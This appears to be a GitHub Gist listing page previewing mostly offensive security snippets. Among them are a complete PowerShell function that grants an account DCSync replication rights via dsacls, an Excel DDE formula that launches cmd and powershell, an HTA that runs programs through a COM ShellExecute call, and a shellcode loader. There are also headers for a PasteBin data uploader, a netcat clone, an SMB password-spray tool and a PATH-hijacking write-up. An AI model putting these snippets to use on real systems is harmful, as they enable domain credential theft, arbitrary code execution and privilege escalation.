Skip to content

Instantly share code, notes, and snippets.

View dcgithub's full-sized avatar
💭
for those about to rock!..

dcgithub

💭
for those about to rock!..
  • None
  • Brisbane
View GitHub Profile
@r00t-3xp10it
r00t-3xp10it / Out-PasteBin.ps1
Last active October 13, 2022 01:07
Authenticates to PasteBin.com, and uploads text data to the website
<#
.SYNOPSIS
Authenticates to PasteBin.com, and uploads text data to PasteBin
Author: @r00t-3xp10it
Credits: @BankSecurity
Tested Under: Windows 10 (19042) x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.0.6
@rmusser01
rmusser01 / mboxexecute.cs
Created March 7, 2022 16:57
Click help in a message box to execute shellcode
//Compile: PS C:\> C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe .\mboxexecute.cs
//Usage: PS C:\> .\mboxexecute.exe <path to shellcode>
//References:
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messageboxindirecta
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-msgboxparamsa
using System;
using System.IO;
@RagnowProductions
RagnowProductions / codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen-in-codepen.markdown
Created March 2, 2022 19:23
Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen...

Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen In Codepen...

A Pen by Fennec The Fox on CodePen.

License.

@loretoparisi
loretoparisi / ukraine.css
Created March 2, 2022 17:15
SVG Lighting Effects With The feDiffuseLighting Filter Primitive
/* Add the seed attribute and set it to a random integer in <feTurbulence> to create your own variant! */
html,
body,
object {
height: 100%;
width: 100%;
margin: 0px;
padding: 0px;
}
div {
@jfmaes
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
[CmdletBinding()]
Param (
[Parameter(Mandatory=$True)]
[string]$AccountName
)
$dse = [ADSI]"LDAP://Rootdse"
$namingcontext = $dse.defaultNamingContext
echo "Giving $AccountName DCSync rights"
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
@r00t-3xp10it
r00t-3xp10it / papacat.ps1
Last active October 6, 2023 02:22
papacat - Netcat, The Powershell Version
<#
pow`er`cat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powe`rc`at
This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.
Usage: papacat [-c or -l] [-p port] [options]
@r00t-3xp10it
r00t-3xp10it / smblogin-spray.ps1
Last active October 13, 2022 01:08
Minimalistic SMB password spray attack tool
<#
.SYNOPSIS
Minimalistic SMB password spray attack tool
Author: @r00t-3xp10it
Addapted From: @InfosecMatter
Tested Under: Windows 10 (19043) x64 bits
Required Dependencies: Get-Service, New-PSDrive {native}
Optional Dependencies: Ping-Object {native}
PS cmdlet Dev version: v1.0.8
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c powershell.exe /c calc'!AO
@r00t-3xp10it
r00t-3xp10it / POC.md
Last active October 13, 2022 01:09
$Env:PATH search order hijacking

PATH interception—search order hijack


Let me explain how '$Env:PATH search order hijacking' vulnerability works:

  • Lets take PING.exe as one example, PING.exe its located in C:\Windows\System32 folder


Vulnerable system PATH configuration example

C:\Program Files\java;
@OlivierLaflamme
OlivierLaflamme / com.hta
Created February 8, 2022 16:29
com.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>